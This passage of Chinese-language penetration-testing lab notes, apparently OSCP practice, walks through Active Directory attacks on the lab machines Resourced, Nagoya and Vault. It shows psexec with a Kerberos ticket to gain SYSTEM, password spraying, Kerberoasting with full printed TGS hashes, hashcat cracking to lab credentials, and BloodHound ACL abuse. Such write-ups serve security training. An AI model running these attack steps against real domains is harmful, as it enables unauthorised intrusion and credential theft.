ADMIN$ [*] Uploading file vYQHuTAK.exe [*] Opening SVCManager on resourcedc.resourced.local..... [*] Creating service BeKj on resourcedc.resourced.local..... [*] Starting service BeKj..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.2145] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32> whoami nt authority\system ``` > `impacket-psexec`: Impacket 工具，用來類 PsExec 模式，在遠端以系統權限執行指令。\ `-k`: 告訴工具使用 Kerberos 認證（搭配 ccache 使用）\ `-no-pass`: 不使用明文密碼，因為有 ticket 就夠了 `resourced.local/Administrator@resourcedc.resourced.local`: 網域與目標身分\ 目標主機是 `resourcedc.resourced.local`\ `-dc-ip 192.168.122.175`: 指定 Domain Controller 的 IP >> 用剛剛拿到的 `.ccache` 票當成憑證（透過 -k + KRB5CCNAME），且不需要密碼 (-no-pass) 也能登入\ 成功後會用 SMB 傳一個 binary 到 ADMIN$，透過 Service Control Manager 建立並啟動一個服務，取得 SYSTEM 權限。 ### ✅ Get Root FLAG # Nagoya  ## Solution ### 1. Recon #### 1.1 Nmap ``` ┌──(chw㉿CHW)-[~] └─$ nmap -sC -sV -p- 192.168.122.21 Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-24 04:22 EDT Stats: 0:03:44 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 9.09% done; ETC: 04:27 (0:01:10 remaining) Nmap scan report for 192.168.122.21 Host is up (0.097s latency). Not shown: 65513 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 |_http-title: Nagoya Industries - Nagoya 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-24 08:26:24Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: nagoya-industries.com0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ldapssl? 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: nagoya-industries.com0., Site: Default-First-Site-Name) 3269/tcp open globalcatLDAPssl? 3389/tcp open ms-wbt-server Microsoft Terminal Services | ssl-cert: Subject: commonName=nagoya.nagoya-industries.com | Not valid before: 2025-03-23T08:22:03 |_Not valid after: 2025-09-22T08:22:03 | rdp-ntlm-info: | Target_Name: NAGOYA-IND | NetBIOS_Domain_Name: NAGOYA-IND | NetBIOS_Computer_Name: NAGOYA | DNS_Domain_Name: nagoya-industries.com | DNS_Computer_Name: nagoya.nagoya-industries.com | DNS_Tree_Name: nagoya-industries.com | Product_Version: 10.0.17763 |_ System_Time: 2025-03-24T08:27:14+00:00 |_ssl-date: 2025-03-24T08:27:54+00:00; 0s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf .NET Message Framing 49666/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49678/tcp open msrpc Microsoft Windows RPC 49679/tcp open msrpc Microsoft Windows RPC 49693/tcp open msrpc Microsoft Windows RPC 49708/tcp open msrpc Microsoft Windows RPC Service Info: Host: NAGOYA; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | smb2-time: | date: 2025-03-24T08:27:16 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 317.33 seconds ``` > DNS, HTTP, kerberos, kpasswd5?, RDP(WBT), SMB, LDAP, HTTPAPI, RPC #### 1.2 Dirb ``` ┌──(chw㉿CHW)-[~] └─$ dirb http://192.168.122.21/ ... ---- Scanning URL: http://192.168.122.21/ ---- + http://192.168.122.21/error (CODE:200|SIZE:3128) + http://192.168.122.21/favicon.ico (CODE:200|SIZE:5430) + http://192.168.122.21/index (CODE:200|SIZE:3530) + http://192.168.122.21/Index (CODE:200|SIZE:3530) + http://192.168.122.21/team (CODE:200|SIZE:6896) ``` - 瀏覽 http://192.168.122.21/ \  > `info@nagoyaindustries.com` - 瀏覽 http://192.168.122.21/Team \  > 建立 user.txt #### 1.3 SMB ``` ┌──(chw㉿CHW)-[~] └─$ smbclient -N -L \\\\192.168.122.21\\ Anonymous login successful Sharename Type Comment --------- ---- ------- Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 192.168.122.21 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available ``` enum4linux ``` ┌──(chw㉿CHW)-[~] └─$ enum4linux -a 192.168.122.21 Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Mar 24 04:36:56 2025 =========================================( Target Information )========================================= Target ........... 192.168.122.21 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ===========================( Enumerating Workgroup/Domain on 192.168.122.21 )=========================== [E] Can't find workgroup/domain ===============================( Nbtstat Information for 192.168.122.21 )=============================== Looking up status of 192.168.122.21 No reply from 192.168.122.21 ... ===============================( Getting domain SID for 192.168.122.21 )=============================== Domain Name: NAGOYA-IND Domain Sid: S-1-5-21-1969309164-1513403977-1686805993 [+] Host is part of a domain (not a workgroup) ... ===========================( Password Policy Information for 192.168.122.21 )=========================== [E] Unexpected error from polenum: [+] Attaching to 192.168.122.21 using a NULL share [+] Trying protocol 139/SMB... [!] Protocol failed: Cannot request session (Called Name:192.168.122.21) [+] Trying protocol 445/SMB... [!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights. [E] Failed to get password policy with rpcclient ... ``` > Domain Name: `NAGOYA-IND`\ > 幾乎都 Access Denied #### 1.4 LDAP ``` ┌──(chw㉿CHW)-[~/Nagoya] └─$ crackmapexec smb 192.168.122.21 -u user.txt -p /usr/share/wordlists/rockyou.txt --shares SMB 192.168.122.21 445 NAGOYA [*] Windows 10 / Server 2019 Build 17763 x64 (name:NAGOYA) (domain:nagoya-industries.com) (signing:True) (SMBv1:False) SMB 192.168.122.21 445 NAGOYA [-] nagoya-industries.com\Matthew.Harrison:123456 STATUS_LOGON_FAILURE ... ``` > 天荒地老，應該不太可能 ``` ┌──(chw㉿CHW)-[~/Nagoya] └─$ cewl -w custom_wordlist.txt http://192.168.122.21/Team ┌──(chw㉿CHW)-[~/Nagoya] └─$ crackmapexec smb 192.168.122.21 -u user.txt -p custom_wordlist.txt --shares ┌──(chw㉿CHW)-[~/Nagoya] └─$ cupp -i ┌──(chw㉿CHW)-[~/Nagoya] └─$ crackmapexec smb 192.168.122.21 -u user.txt -p matthew.txt --shares ``` > 沒有結果 >[!Tip] >參考別人 Writeup > 1. The password was a wild guess that the machine was release on Summer 2023: `Summer2023` ?!! > 2. cewl & CUPPS (2023, Nagoya, seasons): `Summer2023` ?!! > \ > 現在 OSCP AD 靶機，會提供一組帳號密碼登入，就當這樣的狀況繼續打\ > Password Spraying 可以找到 password 對應的 User:\ > `crackmapexec smb 192.168.122.21 -u user.txt -p "Summer2023" --shares` > > `Fiona.Clark:Summer2023` > > ``` > > Share Permissions Remark >>----- >> ----------- ------ >>ADMIN$ Remote Admin >>C$ Default share >>IPC$ READ Remote IPC >>NETLOGON READ Logon server share >>SYSVOL READ Logon server share > > ``` ### 2. Login SMB & RDP #### 2.1 Login SMB ``` ┌──(chw㉿CHW)-[~/Nagoya/SMB_SYSVOL] └─$ smbclient //192.168.122.21/SYSVOL -U "nagoya-industries.com\Fiona.Clark%Summer2023" -c "prompt OFF; recurse ON; mget *" ... ┌──(chw㉿CHW)-[~/Nagoya/SMB_SYSVOL] └─$ tree . └── nagoya-industries.com ├── DfsrPrivate ├── Policies │   ├── {31B2F340-016D-11D2-945F-00C04FB984F9} │   │   ├── GPT.INI │   │   ├── MACHINE │   │   │   ├── Microsoft │   │   │   │   └── Windows NT │   │   │   │   └── SecEdit │   │   │   │   └── GptTmpl.inf │   │   │   └── Registry.pol │   │   └── USER │   └── {6AC1786C-016F-11D2-945F-00C04fB984F9} │   ├── GPT.INI │   ├── MACHINE │   │   └── Microsoft │   │   └── Windows NT │   │   └── SecEdit │   │   └── GptTmpl.inf │   └── USER └── scripts └── ResetPassword ├── ResetPassword.exe ├── ResetPassword.exe.config ├── System.IO.FileSystem.AccessControl.dll ├── System.IO.FileSystem.AccessControl.xml ├── System.Security.AccessControl.dll ├── System.Security.AccessControl.xml ├── System.Security.Permissions.dll ├── System.Security.Permissions.xml ├── System.Security.Principal.Windows.dll └── System.Security.Principal.Windows.xml 18 directories, 15 files ┌──(chw㉿CHW)-[~/Nagoya/SMB_NETLOGON] └─$ smbclient //192.168.122.21/NETLOGON -U "nagoya-industries.com\Fiona.Clark%Summer2023" -c "prompt OFF; recurse ON; mget *" ... ┌──(chw㉿CHW)-[~/Nagoya/SMB_NETLOGON] └─$ tree . └── ResetPassword ├── ResetPassword.exe ├── ResetPassword.exe.config ├── System.IO.FileSystem.AccessControl.dll ├── System.IO.FileSystem.AccessControl.xml ├── System.Security.AccessControl.dll ├── System.Security.AccessControl.xml ├── System.Security.Permissions.dll ├── System.Security.Permissions.xml ├── System.Security.Principal.Windows.dll └── System.Security.Principal.Windows.xml 2 directories, 10 files ``` > - `SMB_SYSVOL/nagoya-industries.com/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf`\ >  #### 2.2 Login RDP ``` ┌──(chw㉿CHW)-[~/Nagoya/SMB_NETLOGON] └─$ xfreerdp /u:Fiona.Clark /p:Summer2023 /v:192.168.122.21 [06:31:09:792] [1582278:1582279] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe [06:31:09:792] [1582278:1582279] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D] [06:31:12:958] [1582278:1582279] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe [06:31:12:958] [1582278:1582279] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D] [06:31:12:958] [1582278:1582279] [ERROR][com.freerdp.core] - freerdp_post_connect failed ┌──(chw㉿CHW)-[~/Nagoya/SMB_NETLOGON] └─$ rdesktop 192.168.122.21 ... ``` > rdesktop 可以開啟，猜測`Fiona.Clark` 沒有 RDP 權限 ### 3. Login RPC ``` ┌──(chw㉿CHW)-[~/Nagoya/SMB_SYSVOL] └─$ rpcclient -U "nagoya-industries.com\\Fiona.Clark" 192.168.122.21 Password for [NAGOYA-INDUSTRIES.COM\Fiona.Clark]: rpcclient $> netshareenum result was WERR_ACCESS_DENIED rpcclient $> lsaquery Domain Name: NAGOYA-IND Domain Sid: S-1-5-21-1969309164-1513403977-1686805993 rpcclient $> getdompwinfo min_password_length: 7 password_properties: 0x00000001 DOMAIN_PASSWORD_COMPLEX rpcclient $> enumdomusers user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[svc_helpdesk] rid:[0x450] user:[Matthew.Harrison] rid:[0x452] user:[Emma.Miah] rid:[0x453] user:[Rebecca.Bell] rid:[0x454] user:[Scott.Gardner] rid:[0x455] user:[Terry.Edwards] rid:[0x456] user:[Holly.Matthews] rid:[0x457] user:[Anne.Jenkins] rid:[0x458] user:[Brett.Naylor] rid:[0x459] user:[Melissa.Mitchell] rid:[0x45a] user:[Craig.Carr] rid:[0x45b] user:[Fiona.Clark] rid:[0x45c] user:[Patrick.Martin] rid:[0x45d] user:[Kate.Watson] rid:[0x45e] user:[Kirsty.Norris] rid:[0x45f] user:[Andrea.Hayes] rid:[0x460] user:[Abigail.Hughes] rid:[0x461] user:[Melanie.Watson] rid:[0x462] user:[Frances.Ward] rid:[0x463] user:[Sylvia.King] rid:[0x464] user:[Wayne.Hartley] rid:[0x465] user:[Iain.White] rid:[0x467] user:[Joanna.Wood] rid:[0x468] user:[Bethan.Webster] rid:[0x469] user:[Elaine.Brady] rid:[0x46b] user:[Christopher.Lewis] rid:[0x46c] user:[Megan.Johnson] rid:[0x46d] user:[Damien.Chapman] rid:[0x46e] user:[Joanne.Lewis] rid:[0x46f] user:[svc_mssql] rid:[0x470] user:[svc_tpl] rid:[0x471] user:[svc_web] rid:[0x472] rpcclient $> queryuser 0x1f4 User Name : Administrator Full Name : Home Drive : Dir Drive : Profile Path: Logon Script: Description : Built-in account for administering the computer/domain Workstations: Comment : Remote Dial : Logon Time : Mon, 24 Mar 2025 07:50:13 EDT Logoff Time : Wed, 31 Dec 1969 19:00:00 EST Kickoff Time : Wed, 31 Dec 1969 19:00:00 EST Password last set Time : Mon, 01 May 2023 11:43:05 EDT Password can change Time : Tue, 02 May 2023 11:43:05 EDT Password must change Time: Wed, 13 Sep 30828 22:48:05 EDT unknown_2[0..31]... user_rid : 0x1f4 group_rid: 0x201 acb_info : 0x00000210 fields_present: 0x00ffffff logon_divs: 168 bad_password_count: 0x00000000 logon_count: 0x00000021 padding1[0..7]... logon_hrs[0..21]... ``` > 1. `netshareenum`: 列出共享資料夾 ACCESS_DENIED > 2. `enumdomusers`: 所有使用者 > 3. 查看 `Administrator` > 4. Password Policy: 最少 7 個字元，開啟複雜度（需大小寫、數字、符號中任兩項） > > 建立 ADuser.txt ### 4. Kerberos AS-REP Roasting 顯示哪些帳號不需要預先驗證就可回傳 TGT hash ``` ┌──(chw㉿CHW)-[~/Nagoya] └─$ cat ADuser.txt Administrator Guest krbtgt svc_helpdesk Matthew.Harrison Emma.Miah Rebecca.Bell ... ┌──(chw㉿CHW)-[~/Nagoya] └─$ impacket-GetNPUsers nagoya-industries.com/ -usersfile ADuser.txt -no-pass -format hashcat -dc-ip 192.168.122.21 Impacket v0.12.0.dev1 - Copyright 2023 Fortra [-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] User svc_helpdesk doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Matthew.Harrison doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Emma.Miah doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Rebecca.Bell doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Scott.Gardner doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Terry.Edwards doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Holly.Matthews doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Anne.Jenkins doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Brett.Naylor doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Melissa.Mitchell doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Craig.Carr doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Fiona.Clark doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Patrick.Martin doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Kate.Watson doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Kirsty.Norris doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Andrea.Hayes doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Abigail.Hughes doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Melanie.Watson doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Frances.Ward doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Sylvia.King doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Wayne.Hartley doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Iain.White doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Joanna.Wood doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Bethan.Webster doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Elaine.Brady doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Christopher.Lewis doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Megan.Johnson doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Damien.Chapman doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User Joanne.Lewis doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User svc_mssql doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User svc_tpl doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User svc_web doesn't have UF_DONT_REQUIRE_PREAUTH set ``` > 這些帳號都需要 Kerberos 預先驗證（pre-authentication），不能進行 AS-REP Roasting 針對服務帳號 Kerberoasting，取得 TGS hash ``` ┌──(chw㉿CHW)-[~/Nagoya] └─$ impacket-GetUserSPNs nagoya-industries.com/Fiona.Clark:Summer2023 -dc-ip 192.168.122.21 -request Impacket v0.12.0.dev1 - Copyright 2023 Fortra ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation ---------------------------------- ------------ ------------------------------------------------ -------------------------- -------------------------- ---------- http/nagoya.nagoya-industries.com svc_helpdesk CN=helpdesk,CN=Users,DC=nagoya-industries,DC=com 2023-04-30 03:31:06.190955 <never> MSSQL/nagoya.nagoya-industries.com svc_mssql 2023-04-30 03:45:33.288595 2024-08-01 21:48:41.441299 [-] CCache file is not found. Skipping... $krb5tgs$23$*svc_helpdesk$NAGOYA-INDUSTRIES.COM$nagoya-industries.com/svc_helpdesk*$5df1df04fc339ba3ebb25fc662d504be$e3cf1c684260e7a68fe9c1a19dab632992bcbde8de6420ef9de9a9f2f525c12dd8334e695bd8b774e5a59234e8a7143346063edef9f62f11afa6f44538691c1402d83c7e39ec7493758351cbdb0b48236447a57f0a5fe1f22e87c77b43c72771d9c6e003f786f649f3bb7c62b41bef494f84d0d1a08d7ae007ffe65490ae59fb0753b5ac5e1c08cf2e4de84907d1ad29090c93897d7cc5a47594d368c52bda4a27c4159c8d4b3f0ac0f73a31e03b8dcfc152ffd6c6563654fd6db9ff62020b0ec8be178fdcead593b085ddb3c7f4dd0fa4353894567e3f46e35c93233b0028a5e1f3121847121435db1ee5d41209abab1b3d90324a9baa407ad0b93012fb468b55efb10a02799800687cd4f5802b39c09bfa43e0e5be00395f03002b54be435f51a0ec4fc6a5c7e7d45b2c694ede89b817198db579401833cac0eac35f06b30d8f0453d7ea1ba6c6aac482e854b34eaf21a244d6d02a3ff20ab98d274cce6e0ca109b21379a6af73e54e1fe459735747032530325a819c53fad7a3ed7ea5defcba19ca06cc8722f0c11fd21776846eaf78693d047a35968020289cdcb644ccf670dc71197f6c8feab7891edccca9126e1fee72de571bd34226bcb24e18d360e3ac951d1e00675b9ba5dd2e326ab6ad0582bc0248c90c4591a01abfb56075b7e0c3c5dbac4127b6f93b7db34c398a5b5312809feb1595f40cdd78bea32d6b9ef6bce670e89656feb94615c1870759fc41fd8d3e6d87091fdab9ddce3da59fb7d8e945c89a496a740b39346b63395ab36000fca167590067ddddcff7ee83db4cdb6c3741b965e54d7ef01f97427affc5fa4282f307158d7859c4c47dc0795a840576c02e6e72f7c765848aa7ce50e096b794dab9e9b1224a463ac6fba80961c2d5d355661537ecadc2c126e2829efde63e4bb7cd12484da85ab1817a4d9f08dcf39ac5f62262f5f54b276b5551bedd74326a4a330d265a6d65031ef538c38c6d071d8cacbd42e914158df27945d145f24a552f800fa06677ed462309a48e3b9daad295035ac002cd61552906bfd4c65eeb205420ba6416b8877e29e27e652cbc5002b724c5e028d93327ecee00d2901b21a7ab3f031a7a7c5f3ab3dbd690a1328e18ab1adf8df2519937c295c5d942a444967d4ae11b76c7405f7d3ffc582d996131329b6bb249c6abd09c493c0e32b3323f571201db7d1b84c3bf99ad70ee5c5541c709b24c23e8a4454de69f45233f9e6cb79b7646fe399ea801d0a10a67d4d2da9143d8e9ec769451d630ad035ff6b8f59746afcccf918ad69bb07e6b4bfcf3e3fbe68ac2ef098a0b87f9752b53c9c170a144cd4bec2851a2d7ebddbe136463dad6c210b8bbdcb14671af1224176549f2c03ab446b4c123780b3c8c545a83df90824bcff76f54c7e4a395365f10788a07ce5ac33f4db57a075338df347826e891877fae786616749a3b5d8523eba922ab283709ca3fe253806a0da9788e5d6d9b5191dc3068e0e12d8d5d9841c3a5c91ba818e31d5e313673e36b964510cb1f7626b54efb29dd2426f0073ddf3f3ad4f49dc8728f9c43557ef047f3eb358fa2d05ae40d2095417e9b58af1a79c1b19e9929ad037ebb4342981b2832e34c6c93b6 $krb5tgs$23$*svc_mssql$NAGOYA-INDUSTRIES.COM$nagoya-industries.com/svc_mssql*$43af99de389c9a1a62eb95d0b7b6d6b3$9dd5d184e50feb388497cf500465676cffe6eaa8eac228bc098131d5948347d5497a70571676e5e2746ff7f620b8d32342807faf58e515c88873a36f5b89878e219ac3a6331732d943f70a23a8e4d881353cc114bad210ca0a86210915dd54e0e0b3f4c483ef6503e74a6d9e1fbd8d02253e481cd49c1ccf305f876659e04e78bfabe98b891af8a6682c4b6f876d207e0409bf772c297da9f4e25b9c676138d4d1ba0aa59ec94a525d02d9063a00339b65969b4a084038bc1f3fd14725f4e3a571dc04f1ea2c34bbfc93532f2cb9cf7436deb4236f8588566bfcdc011a6490f58a0049c8aaf8eebf92b988acec62fa6fac9d59d4ea7bbea809edd25bd0c3e7095653be8caa4e4115c80c41876eea82f542543cdd85e0ded62d2950d318b918989c7705ba6bce2cbf02eaca3f1d1f5d09dbbf2e811e07c9e884f5f4a0edc078c4ccca26571d673df8c9360a39339b2227112b794f69d0bef96cb8f7445ebfc7b450f5e984b1de46e4ff657545f9f343f07103e74830cd2a393b4c6c479cfe2c857e0babb487ac16eab98593d031be52c4b3bbee29e75d48728e662fec88ddfdc58b0435361e33cc34125879986f807eb473e7fad0fade6344d8001ec557ecd66fe69885e5d4c7a390057b4ee807e3c8afaf8ed37255f83c305b64812a946782616fed054595917a54cd10f1c2c4e72be6ab764bb96683266440f40133b78fe8a341959977461a2041173423bf487c05364b7fac3e06b3b34abb020983b8a036026577ee6c3853a8f8494f04dc2a3bc66ca5f3f298b5aaa3f98166c8cf523e6350ef18dd1164850857376f4022b28f175295346d9ae879e6e5edc484ddb75121c7a5552e408491d351d37bc613cbe0116acfa1c5c5d3b539000056d3fdbd481de67e8eca0af10051d9f62912e1c477d72a9dfa175a531391c0d727dce3af3fd37e2df5ad5e227b5c573c03ef6997709ea153c52979edbbb7a37de69984898e14a4d813fe5fe68d3c23b2687c3c73289bbf050082bb9d3f6d4c0f5133bfb32221287ccee60e24587ed65989ac8ec35382f9fe80f0e118ba8f34231dfd4bcfaa0c081112e90fed3b116087e089921838c06d0db511f042f9506a6d0ad06524023c379bb1e332eaf7b5649329b1e05bd3eb7d78967540be735410a951e443c1057d43d3ebf8ce92cb51a9f8c9126c5125f2626c5e48a7ddeaed1eed051d04704b4522fc130a2e8829dac611e327130147d16da8e2480904549c6fdd2946159ee8985aa2ca742888b0e2437897baa4d702150dbbbd44084530d9cca63a258544863d777ca03ffde58b3d34490c5d5b5c567d64ee8c45f54d4184fd78b98a44bd44e7b3472efb8c97922e0cd4b9abb4f0de71fd61668cad9e573a86a0639022205386be1bbaf58d8a769e777c5b759fc05076940a650a820c894ed2427e034d1f63cd6df04ac3112f236d16b1aa5420a7c9a4bd2ba602cb0bf63445e50854ce8ea7fb02c2b47636a5839195a30ac4943bcc8fc1482502bd1ee26844c77c515fee7404bc7694223d4ddd92b93812922186fbd0528562d47a2d5164bd1fa1ed9c6b174eb29eb7f2754a9b9c2d856d73de1127623734135aa72a930fa0ffb1e6b056b74adc7d ``` > 成功取得兩個服務帳號（svc_helpdesk 和 svc_mssql) TGS Hash ``` ┌──(chw㉿CHW)-[~/Nagoya] └─$ echo 'svc_helpdesk HASH' > helpdesk.hash ┌──(chw㉿CHW)-[~/Nagoya] └─$ echo 'svc_mssql HASH' > mssql.hash ┌──(chw㉿CHW)-[~/Nagoya] └─$ hashcat -m 13100 -a 0 helpdesk.hash /usr/share/wordlists/rockyou.txt --force ... ┌──(chw㉿CHW)-[~/Nagoya] └─$ hashcat -m 13100 -a 0 mssql.hash /usr/share/wordlists/rockyou.txt --force ... $krb5tgs$23$*svc_mssql...:Service1 ``` > svc_mssql:Service1 ### 5. 使用 `svc_mssql` Login RPC ``` ┌──(chw㉿CHW)-[~/Nagoya] └─$ rpcclient -U "nagoya-industries.com\\svc_mssql" 192.168.122.21 Password for [NAGOYA-INDUSTRIES.COM\svc_mssql]: rpcclient $> enumdomgroups group:[Enterprise Read-only Domain Controllers] rid:[0x1f2] group:[Domain Admins] rid:[0x200] group:[Domain Users] rid:[0x201] group:[Domain Guests] rid:[0x202] group:[Domain Computers] rid:[0x203] group:[Domain Controllers] rid:[0x204] group:[Schema Admins] rid:[0x206] group:[Enterprise Admins] rid:[0x207] group:[Group Policy Creator Owners] rid:[0x208] group:[Read-only Domain Controllers] rid:[0x209] group:[Cloneable Domain Controllers] rid:[0x20a] group:[Protected Users] rid:[0x20d] group:[Key Admins] rid:[0x20e] group:[Enterprise Key Admins] rid:[0x20f] group:[DnsUpdateProxy] rid:[0x44e] group:[employees] rid:[0x451] group:[helpdesk] rid:[0x466] group:[developers] rid:[0x46a] rpcclient $> querygroupmem 0x200 rid:[0x1f4] attr:[0x7] ``` > Domain Admins 只有 Administrator > svc_mssql 在 Domain Users 中 > >分析 User 與 Group 之間的關係 >[!Important] >- Domain Admins: >`Administrator` >- Domain Guests: >`Guest` >- Schema Admins: >`Administrator` >- Enterprise Admins: >`Administrator` >- employees: >`人名` >- helpdesk: >`svc_helpdesk`, `Iain.Whit`, `Joanna.Wood`, `Bethan.Webster` >- developers: >`Elaine.Brady`, `Christopher.Lewis`, `Megan.Johnson`, `Damien.Chapman`, `Joanne.Lewis` >[!Important] >也可以直接使用 Bloodhound： >`bound-python -u svc_mssql -p Service1 -d nagoya-industries.com -dc nagoya.nagoya-industries.com -ns 192.168.122.21 --dns-tcp --disable-autogc -c all` ### 6. Bloodhound 匯入後發現 `svc_mssql` 有 `Domain Admins`、`Enterprise Admins`、`Account Operators` 的 `GenericAll` 權限  把自己加入 Domain Admins Group ``` ┌──(chw㉿CHW)-[~/Nagoya] └─$ cat /etc/hosts 192.168.122.21 nagoya.nagoya-industries.com ``` ``` ┌──(chw㉿CHW)-[~/Nagoya] └─$ impacket-AddUserSPN nagoya-industries.com/svc_mssql:Service1 -dc-ip 192.168.122.21 --target-name "Domain Admins" --add-acl impacket-AddUserSPN: command not found ``` >[!Note] >目前無解 # Vault  ## Solution ### 1. Recon #### 1.1 Nmap ``` ┌──(chw㉿CHW)-[~/Vault] └─$ nmap -sC -sV -p- 192.168.122.172 ... Host is up (0.10s latency). Not shown: 65514 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-25 11:16:02Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services | ssl-cert: Subject: commonName=DC.vault.offsec | Not valid before: 2025-03-24T11:09:48 |_Not valid after: 2025-09-23T11:09:48 |_ssl-date: 2025-03-25T11:17:31+00:00; -1s from scanner time. | rdp-ntlm-info: | Target_Name: VAULT | NetBIOS_Domain_Name: VAULT | NetBIOS_Computer_Name: DC | DNS_Domain_Name: vault.offsec | DNS_Computer_Name: DC.vault.offsec | DNS_Tree_Name: vault.offsec | Product_Version: 10.0.17763 |_ System_Time: 2025-03-25T11:16:52+00:00 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 49666/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49674/tcp open msrpc Microsoft Windows RPC 49679/tcp open msrpc Microsoft Windows RPC 49703/tcp open msrpc Microsoft Windows RPC 49799/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | smb2-time: | date: 2025-03-25T11:16:52 |_ start_date: N/A ``` > DNS, RPC, SMB, Ldap, Kpass, WinRM ``` ┌──(chw㉿CHW)-[~/Vault] └─$ cat /etc/hosts 192.168.122.172 vault.offsec 192.168.122.172 DC.vault.offsec ``` #### 1.2 SMB ``` ┌──(chw㉿CHW)-[~/Vault] └─$ enum4linux -a 192.168.122.172 =========================================( Target Information )========================================= Target ........... 192.168.122.172 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ... ``` > administrator, guest, krbtgt, domain admins, root, bin, none\ > 其他沒有資訊 ``` 